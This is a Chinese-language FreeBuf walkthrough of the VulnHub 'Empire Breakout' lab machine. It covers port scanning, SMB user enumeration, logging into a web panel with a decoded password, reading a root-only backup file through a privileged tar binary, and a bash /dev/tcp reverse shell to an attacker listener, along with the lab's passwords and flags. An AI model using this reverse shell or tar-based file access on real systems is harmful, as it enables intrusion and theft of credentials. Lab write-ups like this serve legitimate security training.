freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

Empire Breakout靶机渗透
hailong86 2022-05-28 20:56:27 155513
所属地 吉林省

1.靶机介绍

靶机下载地址:https://www.vulnhub.com/entry/empire-breakout,751/
靶机提示:
Description
Difficulty: Easy
This box was created to be an Easy box, but it can be Medium if you get lost.
For hints discord Server ( https://discord.gg/7asvAhCEhe )
靶机IP:10.8.0.103

2.端口发现

扫描靶机信息,发现开放了80、139、445、10000、20000端口,smbd4.6.2 ,20000端口扫描出来了smb信息
图片.png

3.访问WEB

访问WEB,查看源码得到提示和一串 Brainfuck/Ook!密文
图片.png
https://www.splitbrain.org/services/ook解密得到:.2uqPEfj3D<P'a-3
图片.png
一番查找无任何可利用,访问10000、20000端口都是登录界面,通过暴力破解,万能密码等都无收获
图片.png
图片.png

4.SMB枚举

想到之前20000端口扫描出来了smb信息,利用enum4linux -a 10.8.0.103扫描出用户cyber
图片.png

5.WEB登录

尝试利用用户名cyber和密码.2uqPEfj3D<P'a-3,登录之前的2个登录页面,成功登录20000端口页面
图片.png
一番查找之后,发现有个Command shell的图标,点击进入了cyber用户的shell
图片.png
图片.png
发现具有root权限的tar,还有一个user.txt文件,查看user.txt文件,得到一个flag:3mp!r3{You_Manage_To_Break_To_My_Secure_Access}
图片.png
查找网页配置文件,在var下发下有个backups文件夹,进去看一下
图片.png
进入backups文件夹发现有个.old_pass.bak文件,需要root权限才可以查看
图片.png
之前用户目录下有个tar文件具有root权限,利用tar压缩.old_pass.bak,然后再解压,.old_pass.bak就会拥有tar的权限,./tar -czvf pass.zip.gz /var/backups/.old_pass.bak
图片.png
图片.png
tar -zxvf pass.zip.gz解压文件,尝试了指定目录,但只能解压到var/backups/下
图片.png

6.反弹shell获得root权限

查看.old_pass.bak文件,得到Ts&4&YurgtRX(=~h,是root权限的旧密码文件,应该就是root的密码
图片.png
切换root用户,首先得先拿到一个终端的shell,利用nc反弹个shell,bash -c 'exec bash -i &>/dev/tcp/10.8.0.100/1234 <&1',主机nc -lvnp 1234监听,成功拿到shell,想升级一下shell,未成功,直接切换root,密码Ts&4&YurgtRX(=~h,成功拿到flag:mp!r3{You_Manage_To_BreakOut_From_My_System_Congratulation}!!!
图片.png
图片.png

7.总结

挺简单的一个靶机,没有太多难点。

# 渗透测试 # 网络安全 # web安全 # 系统安全 # 漏洞分析
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 hailong86 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
hailong86 LV.5
这家伙太懒了,还未填写个人描述!
  • 25 文章数
  • 11 关注者
Vikings靶机渗透
2023-03-03
HA Rudra靶机渗透
2022-12-18
EVM靶机通关
2022-12-05
文章目录